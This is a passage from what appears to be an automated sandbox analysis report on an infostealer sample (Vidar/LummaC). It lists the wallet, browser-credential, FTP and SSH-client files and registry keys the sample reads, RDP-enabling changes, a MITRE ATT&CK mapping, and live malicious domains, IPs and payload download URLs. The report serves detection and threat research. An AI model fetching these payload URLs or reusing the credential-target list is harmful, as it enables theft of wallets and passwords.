Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: RegAsm.exe, 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Yara match	File source: 00000003.00000002.2843926018.000000000150A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7032, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3532, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2752616723.00000000038F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2870661288.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3ab5570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3ab5570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2144529083.0000000003AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3492, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7032, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3532, type: MEMORYSTR

Allows multiple concurrent remote connection

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\Licensing Core EnableConcurrentSessions

Enables remote desktop connection

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server fDenyTSConnections

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C700C40 sqlite3_bind_zeroblob,	3_2_6C700C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C700D60 sqlite3_bind_parameter_name,	3_2_6C700D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C628EA0 sqlite3_clear_bindings,	3_2_6C628EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C700B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	3_2_6C700B40

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 LSASS Driver	1 LSASS Driver	21 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	2 Remote Desktop Protocol	11 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	111 Deobfuscate/Decode Files or Information	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	1 Create Account	2 Windows Service	41 Obfuscated Files or Information	Security Account Manager	5 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Windows Service	511 Process Injection	12 Software Packing	NTDS	56 System Information Discovery	Distributed Component Object Model	2 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	251 Security Software Discovery	SSH	Keylogging	124 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	23 Masquerading	DCSync	12 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	511 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66f5de72d9ebd_rdp[1].exe	100%	Avira	HEUR/AGEN.1311769
C:\ProgramData\BKJKEBGDHD.exe	100%	Avira	HEUR/AGEN.1311769
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66f5de72d9ebd_rdp[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\RDPWInst.exe	100%	Joe Sandbox ML
C:\ProgramData\BKJKEBGDHD.exe	100%	Joe Sandbox ML
C:\Program Files\RDP Wrapper\rdpwrap.dll	54%	ReversingLabs	Win64.PUA.RDPWrapper
C:\ProgramData\GIJEGDAKEH.exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66f5db9e54794_vfkagks[1].exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\Users\user\AppData\Local\Temp\RDPWInst.exe	47%	ReversingLabs	Win32.PUA.RDPWrap
C:\Windows\System32\rfxvmt.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	URL Reputation	safe
http://www.valvesoftware.com/legal.htm	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	0%	URL Reputation	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900	100%	URL Reputation	malware
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
http://www.entrust.net/rpa03	0%	URL Reputation	safe
http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe1kkkk1220804http://147.45.44.104/prog/66f5db9e	100%	Avira URL Cloud	malware
http://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
http://cowod.hopto.JKFCAF	0%	Avira URL Cloud	safe
http://hansgborn.eud	0%	Avira URL Cloud	safe
https://store.steampowered.com/points/shop/	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://steamcommunity.com/?subsection=broadcasts	0%	Avira URL Cloud	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/inventory/	100%	URL Reputation	malware
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	0%	URL Reputation	safe
reinforcenh.shop	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e	0%	Avira URL Cloud	safe
http://api.ipify.orgd	0%	Avira URL Cloud	safe
https://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	0%	URL Reputation	safe
stogeneratmns.shop	100%	Avira URL Cloud	malware
http://cowod.hopto.org	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	0%	URL Reputation	safe
https://5.75.211.162/mozglue.dll	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	0%	URL Reputation	safe
https://www.entrust.net/rpa0	0%	URL Reputation	safe
https://store.steampowered.com/about/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net02	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/76561199780418869/badges	100%	Avira URL Cloud	malware
https://hansgborn.eu/receive.php	0%	Avira URL Cloud	safe
http://cowod.hopto.org_DEBUG.zip/c	0%	Avira URL Cloud	safe
http://stascorp.com/load/1-1-0-62	0%	Avira URL Cloud	safe
https://5.75.211.162/freebl3.dll	100%	Avira URL Cloud	malware
https://5.75.211.162/vcruntime140.dll	100%	Avira URL Cloud	malware
https://reinforcenh.shop/api	100%	Avira URL Cloud	malware
ghostreedmnu.shop	100%	Avira URL Cloud	malware
http://cowod.hopto.	0%	Avira URL Cloud	safe
https://5.75.211.162h;	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0	0%	Avira URL Cloud	safe
wallkedsleeoi.shop	100%	Avira URL Cloud	malware
https://5.75.211.162/F_	100%	Avira URL Cloud	malware
http://cowod.hopto	0%	Avira URL Cloud	safe
http://api.ipify.org/	0%	Avira URL Cloud	safe
https://reinforcenh.shop/	100%	Avira URL Cloud	malware
https://5.75.211.162	100%	Avira URL Cloud	malware
https://5.75.211.162GIJDH	0%	Avira URL Cloud	safe
https://ballotnwu.site/apik	0%	Avira URL Cloud	safe
https://store.steampowered.com/privac	0%	Avira URL Cloud	safe
https://help.steampowered	0%	Avira URL Cloud	safe
https://5.75.211.162.exe	0%	Avira URL Cloud	safe
http://www.mozilla.com/en-US/blocklist/	0%	Avira URL Cloud	safe
https://t.me/ae5ed	100%	Avira URL Cloud	malware
https://steamcommunity.com/f	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP	0%	Avira URL Cloud	safe
https://5.75.211.162/B	100%	Avira URL Cloud	malware
https://github.com/lontivero/Open.Nat/issuesOAlso	0%	Avira URL Cloud	safe
https://5.75.211.162/C	100%	Avira URL Cloud	malware
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
http://cowod.hoptoHJKFCAF	0%	Avira URL Cloud	safe
https://hansgborn.eu/receive.phpd	0%	Avira URL Cloud	safe
https://vozmeatillu.shop/api	100%	Avira URL Cloud	malware
http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe	100%	Avira URL Cloud	malware
http://stascorp.comDVarFileInfo$	0%	Avira URL Cloud	safe
https://offensivedzvju.shop/api	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en	0%	Avira URL Cloud	safe
https://5.75.211.162/;_	100%	Avira URL Cloud	malware
fragnantbui.shop	100%	Avira URL Cloud	malware
offensivedzvju.shop	100%	Avira URL Cloud	malware
https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt	0%	Avira URL Cloud	safe
drawzhotdog.shop	100%	Avira URL Cloud	malware
http://cowod.BKFIDHJKFCAF	0%	Avira URL Cloud	safe
http://cowod.hopto.orgCAF	0%	Avira URL Cloud	safe
vozmeatillu.shop	100%	Avira URL Cloud	malware
https://steamcommunity.com/profiles/76561199780418869z	0%	Avira URL Cloud	safe
https://drawzhotdog.shop/api	100%	Avira URL Cloud	malware
https://steamcommunity.com/my/wishlist/	0%	Avira URL Cloud	safe
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	0%	Avira URL Cloud	safe
http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe	100%	Avira URL Cloud	malware
https://gutterydhowi.shop/api	100%	Avira URL Cloud	malware
https://5.75.211.162/msvcp140.dllh	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
fragnantbui.shop	188.114.97.3	true	true	unknown
gutterydhowi.shop	104.21.4.136	true	true	unknown
cowod.hopto.org	45.132.206.251	true	true	unknown
offensivedzvju.shop	188.114.96.3	true	true	unknown
drawzhotdog.shop	172.67.162.108	true	true	unknown
ghostreedmnu.shop	188.114.97.3	true	true	unknown
ballotnwu.site	172.67.128.144	true	true	unknown
wallkedsleeoi.shop	172.67.194.216	true	true	unknown
hansgborn.eu	188.114.97.3	true	true	unknown
steamcommunity.com	104.102.49.254	true	true	unknown
stogeneratmns.shop	188.114.97.3	true	true	unknown
reinforcenh.shop	104.21.77.130	true	true	unknown
api.ipify.org	172.67.74.152	true	false	unknown
vozmeatillu.shop	188.114.97.3	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
stogeneratmns.shop	true	Avira URL Cloud: malware	unknown
reinforcenh.shop	true	Avira URL Cloud: malware	unknown
https://5.75.211.162/mozglue.dll	true	Avira URL Cloud: malware	unknown
https://hansgborn.eu/receive.php	true	Avira URL Cloud: safe	unknown
https://5.75.211.162/freebl3.dll	true	Avira URL Cloud: malware	unknown
https://reinforcenh.shop/api	true	Avira URL Cloud: malware	unknown
ghostreedmnu.shop	true	Avira URL Cloud: malware	unknown
https://5.75.211.162/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
wallkedsleeoi.shop	true	Avira URL Cloud: malware	unknown
http://api.ipify.org/	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
https://vozmeatillu.shop/api	true	Avira URL Cloud: malware	unknown
fragnantbui.shop	true	Avira URL Cloud: malware	unknown
http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe	false	Avira URL Cloud: malware	unknown
https://offensivedzvju.shop/api	true	Avira URL Cloud: malware	unknown
offensivedzvju.shop	true	Avira URL Cloud: malware	unknown
drawzhotdog.shop	true	Avira URL Cloud: malware	unknown
vozmeatillu.shop	true	Avira URL Cloud: malware	unknown
https://drawzhotdog.shop/api	true	Avira URL Cloud: malware	unknown
http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe	false	Avira URL Cloud: malware	unknown
https://gutterydhowi.shop/api	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe1kkkk1220804http://147.45.44.104/prog/66f5db9e	RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://duckduckgo.com/chrome_newtab	CFBAKK.3.dr	false	URL Reputation: safe	unknown
http://api.ipify.orgd	BKJKEBGDHD.exe, 0000000F.00000002.3052610087.0000000003008000.00000004.00000800.00020000.00000000.sdmp, BKJKEBGDHD.exe, 0000000F.00000002.3052610087.0000000003027000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	CFBAKK.3.dr	false	URL Reputation: safe	unknown
